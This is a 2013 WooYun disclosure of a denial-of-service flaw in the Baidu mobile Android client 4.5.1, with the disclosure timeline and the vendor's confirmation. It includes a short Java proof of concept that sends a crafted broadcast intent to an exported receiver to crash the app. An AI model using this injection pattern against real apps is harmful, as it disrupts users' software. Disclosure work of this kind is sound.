当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034181

漏洞标题:手机百度4.5.1Android客户端DOS攻击

相关厂商:百度

漏洞作者: Vincent

提交时间:2013-08-12 17:11

修复时间:2013-11-10 17:12

公开时间:2013-11-10 17:12

漏洞类型:拒绝服务

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-12: 细节已通知厂商并且等待厂商处理中
2013-08-13: 厂商已经确认,细节仅向厂商公开
2013-08-16: 细节向第三方安全合作伙伴开放
2013-10-07: 细节向核心白帽子及相关领域专家公开
2013-10-17: 细节向普通白帽子公开
2013-10-27: 细节向实习白帽子公开
2013-11-10: 细节向公众公开

简要描述:

手机百度客户端4.5.1中com.baidu.android.defense.push.PushMsgReceiver的存在DOS攻击。
PushMsgReceiver可接收com.baidu.android.pushservice.action.MESSAGE和com.baidu.android.pushservice.action.RECEIVE两种消息。发送com.baidu.android.pushservice.action.RECEIVE消息,可使手机百度崩溃。

详细说明:

AndroidManifest.xml文件中注册了com.baidu.android.defense.push.PushMsgReceiver的receiver:
<receiver android:name="com.baidu.android.defense.push.PushMsgReceiver" android:process=":bdservice_v1">
<intent-filter>
<action android:name="com.baidu.android.pushservice.action.RECEIVE" />
<action android:name="com.baidu.android.pushservice.action.MESSAGE" />
</intent-filter>
</receiver>
可接收com.baidu.android.pushservice.action.MESSAGE和com.baidu.android.pushservice.action.RECEIVE消息,看代码:

1.gif

漏洞证明:

攻击代码:
Button b2 = (Button) findViewById(R.id.button2);
b2.setOnClickListener(new View.OnClickListener() {
public void onClick(View v) {
Intent intent = new Intent().setAction(
"com.baidu.android.pushservice.action.RECEIVE").putExtra("content",
"{'response_params':'ababab','channel_id':'1212','user_id':'3434'},'appid':'543540'");
sendBroadcast(intent);
}
});
测试结果:

2.gif

修复方案:

版权声明:转载请注明来源 Vincent@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-08-13 10:54

厂商回复:

感谢对百度安全的关注,我们马上处理。
--“百度,因你更安全”

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-12 17:45 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    看完简介我就知道详情了

  2. 2013-08-12 22:05 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    看完简介我就知道详情了